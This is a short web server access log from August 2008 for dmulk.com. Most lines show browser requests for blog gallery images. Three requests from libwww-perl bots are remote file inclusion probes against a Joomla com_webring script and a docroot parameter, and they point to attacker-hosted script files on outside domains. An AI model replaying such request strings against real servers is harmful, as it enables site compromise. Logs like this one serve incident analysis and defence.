203.22.204.97 - - [21/Aug/2008:11:38:31 -0700] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://chuckysplace.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
203.22.204.97 - - [21/Aug/2008:11:38:31 -0700] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://chuckysplace.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:38:32 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-117_0.jpg HTTP/1.1" 200 525046 "http://dmulk.com/blog/2008/08/page/3/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:38:32 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-119_0.jpg HTTP/1.1" 200 444844 "http://dmulk.com/blog/2008/08/page/3/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:38:32 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-085_0.jpg HTTP/1.1" 200 371866 "http://dmulk.com/blog/2008/08/page/3/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
69.19.225.130 - - [21/Aug/2008:11:38:32 -0700] "GET /logs//?path%5Bdocroot%5D=http://www.aquaplant-chile.cl/albums/assscmd.txt??? HTTP/1.1" 200 61575 "-" "libwww-perl/5.808" "www.dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:38:33 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-143_0.jpg HTTP/1.1" 200 394995 "http://dmulk.com/blog/2008/08/page/3/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:38:33 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-101_0.jpg HTTP/1.1" 200 470262 "http://dmulk.com/blog/2008/08/page/3/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
206.190.75.8 - - [21/Aug/2008:11:38:34 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-144_0.jpg HTTP/1.1" 200 456573 "http://dmulk.com/blog/2008/08/page/3/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; InfoPath.1)" "dmulk.com"
